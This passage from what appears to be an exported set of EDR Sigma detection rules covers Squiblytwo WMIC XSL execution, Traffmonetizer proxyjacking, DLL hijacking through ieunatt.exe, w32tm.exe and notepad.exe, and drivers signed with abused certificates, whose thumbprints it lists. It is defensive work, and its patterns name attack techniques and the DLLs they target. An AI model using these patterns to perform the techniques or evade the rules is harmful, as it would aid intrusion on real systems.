\"format\":'\n - '/ \"format\" :'\n\n exclusion_fp:\n CommandLine|contains:\n # Builtins formats\n - '/format:list'\n - '/ format:list'\n - '/format: list'\n - '/format:table'\n - '/ format:table'\n - '/format: table'\n - '/format:CSV'\n - '/ format:CSV'\n - '/format: CSV'\n - '/format:rawxml'\n - '/ format:rawxml'\n - '/format: rawxml'\n - '/format:mof'\n - '/ format:mof'\n - '/format: mof'\n - '/format:htable'\n - '/ format:htable'\n - '/format: htable'\n - '/format:hform'\n - '/ format:hform'\n - '/format: hform'\n - '/format:texttable'\n - '/ format:texttable'\n - '/format: texttable'\n - '/format:textvaluelist'\n - '/ format:textvaluelist'\n - '/format: textvaluelist'\n - '/format:htable-sortby'\n - '/ format:htable-sortby'\n - '/format: htable-sortby'\n - '/format:value'\n - '/ format:value'\n - '/format: value'\n - \"/format:'lib/csv.xsl'\"\n - '/format:?:\\Windows\\System32\\wbem\\' # /format:C:\\Windows\\System32\\wbem\\en-us\\csv\n\n exclusion_meshagent:\n # C:\\Program Files\\Mesh Agent\\MeshAgent.exe\n # ?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\n # D:\\MeshAgent.exe\n ParentImage|endswith: '\\MeshAgent.exe'\n CommandLine:\n - 'wmic diskdrive LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv' # (fr-FR, en-US)\n - 'wmic PATH Win32_VideoController GET Name,CurrentHorizontalResolution,CurrentVerticalResolution /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic CPU LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic PARTITION LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic OS GET /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic MEMORYCHIP LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic ComputerSystem get PCSystemType /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + 
"rule_id": "1a6ba792-4593-442a-9a80-d38ce5e97360", + "rule_name": "Possible Squiblytwo Attack Detected", + "rule_description": "Detects the usage of a custom formatter to gain remote execution through WMIC execution.\nWMIC can take an XSL script to format the data, which may execute a malicious JScript. This technique is also known as Squiblytwo.\nIt is recommended to check for suspicious activities by the current process or any of its children.\n", + "rule_creation_date": "2021-02-08", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1047", + "attack.t1059.007", + "attack.t1218", + "attack.t1220" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a7b3a94-a404-42ce-ba50-a9808950b58a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.597287Z", + "creation_date": "2026-03-23T11:45:34.597290Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.597298Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ 
+ "https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking", + "https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html", + "https://attack.mitre.org/techniques/T1496/" + ], + "name": "t1496_traffmonetizer.yml", + "content": "title: Traffmonetizer Executed\nid: 1a7b3a94-a404-42ce-ba50-a9808950b58a\ndescription: |\n Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a peer-to-peer (P2P) network.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' start accept --token'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1a7b3a94-a404-42ce-ba50-a9808950b58a", + "rule_name": "Traffmonetizer Executed", + "rule_description": "Detects the usage of Traffmonetizer, a tool that allows users to monetize their unused Internet bandwidth by sharing it with companies or services via a 
peer-to-peer (P2P) network.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n", + "rule_creation_date": "2024-09-26", + "rule_modified_date": "2025-02-18", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1496" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.601095Z", + "creation_date": "2026-03-23T11:45:34.601098Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.601106Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + 
"name": "t1574_001_dll_hijacking_ieunatt.yml", + "content": "title: DLL Hijacking via ieunatt.exe\nid: 1a8169a6-7d34-4131-9f89-3783ecb9ae0c\ndescription: |\n Detects potential Windows DLL Hijacking via ieunatt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ieunatt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c", + "rule_name": "DLL Hijacking via ieunatt.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ieunatt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097553Z", + "creation_date": 
"2026-03-23T11:45:34.097555Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097559Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_w32tm.yml", + "content": "title: DLL Hijacking via w32tm.exe\nid: 1a8b04c9-09a5-479f-8bf1-4cf580c1eec9\ndescription: |\n Detects potential Windows DLL Hijacking via w32tm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w32tm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9", + "rule_name": "DLL Hijacking via w32tm.exe", + "rule_description": "Detects potential Windows DLL Hijacking via w32tm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1ab2fc0d-1160-461b-99f6-f7936f152d34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.094714Z", + "creation_date": "2026-03-23T11:45:34.094716Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.094720Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_notepad.yml", + "content": "title: DLL Hijacking via notepad.exe\nid: 1ab2fc0d-1160-461b-99f6-f7936f152d34\ndescription: |\n Detects potential Windows DLL Hijacking via notepad.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\cabview.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\explorerframe.dll'\n - '\\mmdevapi.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\ntshrui.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\wpdshext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1ab2fc0d-1160-461b-99f6-f7936f152d34", + "rule_name": "DLL Hijacking via notepad.exe", + "rule_description": "Detects potential Windows DLL 
Hijacking via notepad.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-10-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.625804Z", + "creation_date": "2026-03-23T11:45:34.625806Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.625810Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://blog.talosintelligence.com/old-certificate-new-signature/", + "https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf", + "https://twitter.com/th3_protoCOL/status/1587823143854698497", + "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass", + "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", + "https://twitter.com/pr0xylife/status/1595096438798696448", + "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware", + "https://twitter.com/ESETresearch/status/1594937059348992001", + "https://twitter.com/jaydinbas/status/1646475092006785027", + "https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html", + "https://attack.mitre.org/techniques/T1553/002/" + ], + "name": "t1553_002_driver_malicious_certificate.yml", + "content": "title: Driver Loaded Signed with Malicious Certificate\nid: 1b15c2a0-d1d2-4628-a592-e6c9c314baff\ndescription: |\n Detects the loading of drivers signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the loaded driver for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - 
https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - 
'68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # 
https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. 
BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff", + "rule_name": "Driver Loaded Signed with Malicious Certificate", + "rule_description": "Detects the loading of drivers signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded driver for malicious contents.\n", + "rule_creation_date": "2022-07-21", + "rule_modified_date": "2025-12-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.002" + ], + "warnings": null, + 